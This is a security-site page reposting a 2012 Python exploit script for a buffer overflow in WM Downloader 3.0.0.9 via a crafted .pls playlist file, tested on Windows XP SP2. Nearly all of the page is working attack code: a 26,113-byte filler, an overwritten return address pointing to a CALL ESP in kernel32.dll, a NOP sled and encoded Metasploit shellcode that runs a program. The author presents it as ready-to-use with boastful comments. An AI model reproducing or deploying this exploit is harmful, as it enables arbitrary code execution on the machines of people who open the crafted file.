首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WM Downloader 3.0.0.9 (.pls) Buffer Overflow Exploit
来源:fb.com/TN.spl0it3r 作者:Tunisian 发布时间:2012-04-10  
#+----------------------------------------------------------------------+
# Exploit Title: WM Downloader 3.0.0.9 (.pls) Buffer Overflow Exploit
# Date: 08/04/2012
# Author: Tunisian spl01t3r
# Tested on: windows XP sp2
# Greetz: Milw0rm 1337day.com
# 
#	 ____ (_) ____   ___
#	(  _ \| |(  _ \ / _ \
#	| | | | || | | x |_|
#	| ||_/|_|| ||_/ \___/
#	|_|      |_|
#	 _ 
#	(_)  ____   ____  ____     _____ 
#	| | /  __| /  __| \__ \   /  `  \ 
#	| | \___ \ \___ \  / _ \_ | Y Y  \
#	|_| |____/ |____/ (___  / |_|_|  /
#						  \/       \/                          
+----------------------------------------------------------------------+
#!/usr/bin/python

import sys,os
print "###############################################"
print "#           WM Downloader 3.0.0.9             #"
print "#             Tunisian_spl01t3r               #"
print "#           tn.spl01t3r@gmail.com             #"
print "#             fb.com/TN.spl0it3r              #"
print "###############################################\r\n"

file=open('iss.pls','w')
buffer="\x41" * 26113   
eip="\xF0\x69\x83\x7C"   # 7C8369F0 CALL ESP kernel32.dll
nops="\x90" * 30     

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com  
shellcode = (
	"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4"
	"\x0d\x2b\xba\x83\xeb\xfc\xe2\xf4\x58\xe5\x6f\xba\xa4\x0d\xa0\xff"
	"\x98\x86\x57\xbf\xdc\x0c\xc4\x31\xeb\x15\xa0\xe5\x84\x0c\xc0\xf3"
	"\x2f\x39\xa0\xbb\x4a\x3c\xeb\x23\x08\x89\xeb\xce\xa3\xcc\xe1\xb7"
	"\xa5\xcf\xc0\x4e\x9f\x59\x0f\xbe\xd1\xe8\xa0\xe5\x80\x0c\xc0\xdc"
	"\x2f\x01\x60\x31\xfb\x11\x2a\x51\x2f\x11\xa0\xbb\x4f\x84\x77\x9e"
	"\xa0\xce\x1a\x7a\xc0\x86\x6b\x8a\x21\xcd\x53\xb6\x2f\x4d\x27\x31"
	"\xd4\x11\x86\x31\xcc\x05\xc0\xb3\x2f\x8d\x9b\xba\xa4\x0d\xa0\xd2"
	"\x98\x52\x1a\x4c\xc4\x5b\xa2\x42\x27\xcd\x50\xea\xcc\xfd\xa1\xbe"
	"\xfb\x65\xb3\x44\x2e\x03\x7c\x45\x43\x6e\x4a\xd6\xc7\x0d\x2b\xba")
	   
file.write(buffer+eip+nops+shellcode)
print "\n [+] 3vil File Created  \n\n"
print "\n   enj0y ;)  \n\n"
print shell
raw_input("[+] Press any key to exit...")
file.close()


#+----------------------------------------------------------------------+
#[+] greetz to : BIbou sfaxien ; mech lazem ;tn_scorpion ; anas laaribi ;
#       jendoubi ahmed ; s-man ; chaouki mkachakh & ;) --Geni ryodan-- ;)
#	   
#	                      mAhna mAhna 
#	   
#[+] profile :  www.facebook.com/TN.spl0it3r    
#
#+----------------------------------------------------------------------+



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mini-stream RM-MP3 Converter v
·IBM Tivoli Provisioning Manage
·Dolibarr ERP & CRM 3 Post-Auth
·WM Downloader 3.1.2.2(.asx) Bu
·Snort 2 DCE/RPC preprocessor B
·CastRipper 2.9.6 (.pls)/(wvx)
·Mini-stream RM-MP3 Converter
·Local buffer overflow (.m3u ,
·一次简单的POST注入测试
·Mozilla Firefox Bootstrapped A
·Hishop 5.4 & 5.4.1 SQL injecti
·Backtrack 5 R2 wicd Privilege
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved